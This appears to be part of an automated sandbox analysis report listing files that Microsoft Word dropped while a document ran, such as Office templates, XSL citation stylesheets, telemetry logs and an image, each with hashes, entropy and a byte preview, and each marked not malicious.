                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.u.Q.O.+.7.r.s.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.m.W.R.N.r.Z.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:PNG image data, 342 x 342, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2868
                                                                                                                                                                                                                                                                Entropy (8bit):7.341352879473559
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:otnDV9HSzbSZS7RWASDS7f9SNq3+SV12PSl8JVK9SRAtSm2SLjhddvSP54vPC48P:otDV1SnSZS9SDSb9SNq3+SV1ESmJVK9g
                                                                                                                                                                                                                                                                MD5:7C8EE9C69EB2176D9A78454218172B18
                                                                                                                                                                                                                                                                SHA1:A052AEC87F59480F82CE3AA5D9E9B3F8B8F97241
                                                                                                                                                                                                                                                                SHA-256:4880F4725C7BAEE648EA39814A50FBA31FF256219B8C5D9104A83D9F83BA7C49
                                                                                                                                                                                                                                                                SHA-512:39B0919AE09B1CFEF3BF2C46E8D4112B72E8C82626A1F504ECB3EF90E78FE93F3574FC1361F0038F8D7BBE4D21A31FD2A4F74027419F49CFC7F7341FDC60B92C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR...V...V.......".....IDATx....n#9...."....=2..A...s..v.l./..D~..?...._.....k..^...g...S......*w...T.....u".....&. ...h..?M.B..Z.7...........5.k..9u..}.=....@4...D.D...M.@..;.....N.0......}....}...S&....?h...D.D...M.@4...J;.....>.V\y.......S+..Y&.#L..O.>.1..h".....&. ...h.......G.o.c..j.].......&. ...h".....V...\......'=......R..'...N....<.r.Y.D...M.@4...D.D..#..:..g..z.W..t.:.....k.~*..c...D.D...M.@4...^..2.Yx...U.w.......V.....,.....&. ...h"..5....rw-..X.w..|.....u.L.....,.....&. ...h"..mv..[e.x.Z%....S;&}g(&wp&..S...Z.c...D.D...M.@4...6......V=.2.k..N]..Vg.<#p.o.o..,.....&. ...h"..}Xf..|..Wt'..........&.#V..b..n...D.D...M.@4.......Y.5Y..oE...YM.....pw..,.....&. ...h"...:....W......z..t.j...jr.l...._D.D...M.@4.......V.go.=.V...\.w....._#h.{6..h".....&. ...h.:.WL>.^...U.+&O:.}...wM.Gx..i....&. ...h".....v..@_...]w..Lv}...o....N.P........... ...h".....&. .>...P.KS.~e...x*c.&{(.V.j.Y.D...M.@4...D.D.P5ho..n..xj.o.`....>B.......k1..h".
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                                                Entropy (8bit):0.3613836054883338
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                                                                                                                                MD5:679672A5004E0AF50529F33DB5469699
                                                                                                                                                                                                                                                                SHA1:427A4EC3281C9C4FAEB47A22FFBE7CA3E928AFB0
                                                                                                                                                                                                                                                                SHA-256:205D000AA762F3A96AC3AD4B25D791B5F7FC8EFB9056B78F299F671A02B9FD21
                                                                                                                                                                                                                                                                SHA-512:F8615C5E5CF768A94E06961C7C8BEF99BEB43E004A882A4E384F5DD56E047CA59B963A59971F78DCF4C35D1BB92D3A9BC7055BFA3A0D597635DE1A9CE06A3476
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1836
                                                                                                                                                                                                                                                                Entropy (8bit):1.8286326732462288
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:gapgPb/LpMMMMMMMMMMMMMiOo4/GZ+9gWHfWH6eEzyzt1uDVDB1KwmcXw:fK/pMMMMMMMMMMMMMc4KHadVF1KwmcXw
                                                                                                                                                                                                                                                                MD5:FD493170039D13E7A04A46F98BBF6F35
                                                                                                                                                                                                                                                                SHA1:18F22D0EB3B5973C76F548C284A43E6698198866
                                                                                                                                                                                                                                                                SHA-256:A0218A3B710CB31A93FBA9528DB690F6F335B9AABF5D25C29B540D07DAD27E99
                                                                                                                                                                                                                                                                SHA-512:D677393F9DD2D635D1665BDE363BEAC9B198722A3821625311A2E4744F740F024324F41E3A37FD6617B052A3B66619DA68746654DFFB434E64899CEBAEF1714D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:....................S.o.l.u.t.i.o.n.z. .E.m.p.l.o.y.e.e. .H.a.n.d.b.o.o.k...E.f.f.e.c.t.i.v.e. .d.a.t.e. .A.u.g.u.s.t. .2.0.2.4.......A.l.l. .S.o.l.u.t.i.o.n.z. .......................................................................................................................................................................................................................................................................................................................................................................................L...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1536
                                                                                                                                                                                                                                                                Entropy (8bit):1.4929866398948992
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:mEMEEE3Dmlc9lCgKW1+XlrCEvkhEvHwEv6w:tDmGYPW9pNY
                                                                                                                                                                                                                                                                MD5:D4539CFF8F3F334C8AE0C015185F6C11
                                                                                                                                                                                                                                                                SHA1:8D1A9A076844F255CDD62198BAC0F4EBF6651E11
                                                                                                                                                                                                                                                                SHA-256:B48B58D446C378F574CA429E562E22B4E529963EDC6F29B924E0881E85898EB8
                                                                                                                                                                                                                                                                SHA-512:FE509696BB183FFD64FF19B477FD97FCB869B906C4F6A15F44EEBD9F4E09D146E836F4E0F828EABECA114BEA8239E93E6A07193E5AA99D86153400D26324030C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(...j.o.n.e.s...j............................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...\...h.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (11241), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):33805
                                                                                                                                                                                                                                                                Entropy (8bit):5.485803314839421
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:ZKTtnjvtv0oiqLPm8UrfddZJkujKnXZIt2p0FTatF8n/1UAFu4BWMp5Rbwes+NFh:ZKTtnjvtvRiqLPmxrfdvJkcKJIt2pIwg
                                                                                                                                                                                                                                                                MD5:76750BA7C2CF537ADF6E33300DAED974
                                                                                                                                                                                                                                                                SHA1:199202425DF8A8C8E5FE733B2AFB15B7B76F774A
                                                                                                                                                                                                                                                                SHA-256:DCA819134FB8D54F9AE4D64BF4490DB03AB52AFEBA4BF19E3FFFF95FC0CC83EA
                                                                                                                                                                                                                                                                SHA-512:7232756704C814C439ECD2F1A8850758F254BA80AFCC207C6961A6BD6C5D7A49E7D74520FF4C3C4AE8CD460B386421B0AEC04C347CFE2928C08ECB35FD95132F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..08/12/2024 13:22:36.555.WINWORD (0x1B88).0x194C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-08-12T13:22:36.555Z","Contract":"Office.System.Activity","Activity.CV":"Lygl5Ujx9kmN26ejpyCP7w.7.1","Activity.Duration":430,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...08/12/2024 13:22:36.555.WINWORD (0x1B88).0x194C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2024-08-12T13:22:36.555Z","Contract":"Office.System.Activity","Activity.CV":"Lygl5Ujx9kmN26ejpyCP7w.7","Activity.Duration":2520,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3611324
                                                                                                                                                                                                                                                                Entropy (8bit):7.965784120725206
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                                                                                                                                MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                                                                                                                                SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                                                                                                                                SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                                                                                                                                SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):288
                                                                                                                                                                                                                                                                Entropy (8bit):3.5359188337181853
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                                                                                                                                                                                                SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                                                                                                                                                                                                SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                                                                                                                                                                                                SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):274
                                                                                                                                                                                                                                                                Entropy (8bit):3.4699940532942914
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                                                                                                                                MD5:55BA5B2974A072B131249FD9FD42EB91
                                                                                                                                                                                                                                                                SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                                                                                                                                                                                                                                SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                                                                                                                                                                                                                                SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3465076
                                                                                                                                                                                                                                                                Entropy (8bit):7.898517227646252
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                                                                                                                                MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                                                                                                                                SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                                                                                                                                SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                                                                                                                                SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):314
                                                                                                                                                                                                                                                                Entropy (8bit):3.5230842510951934
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                                                                                                                                                                                                                                SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                                                                                                                                                                                                                                SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                                                                                                                                                                                                                                SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):294178
                                                                                                                                                                                                                                                                Entropy (8bit):4.977758311135714
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                                                                                                                                MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                                                                                                                                SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                                                                                                                                SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                                                                                                                                SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):292
                                                                                                                                                                                                                                                                Entropy (8bit):3.5026803317779778
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:A0D51783BFEE86F3AC46A810404B6796
                                                                                                                                                                                                                                                                SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                                                                                                                                                                                                                                SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                                                                                                                                                                                                                                SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):251032
                                                                                                                                                                                                                                                                Entropy (8bit):5.102652100491927
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                                                                                                                                MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                                                                                                                                SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                                                                                                                                SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                                                                                                                                SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):332
                                                                                                                                                                                                                                                                Entropy (8bit):3.4871192480632223
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                                                                                                                                                                                                                                SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                                                                                                                                                                                                                                SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                                                                                                                                                                                                                                SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):254875
                                                                                                                                                                                                                                                                Entropy (8bit):5.003842588822783
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                                                                                                                                MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                                                                                                                                SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                                                                                                                                SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                                                                                                                                SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                                                                                                                                Malicious:false
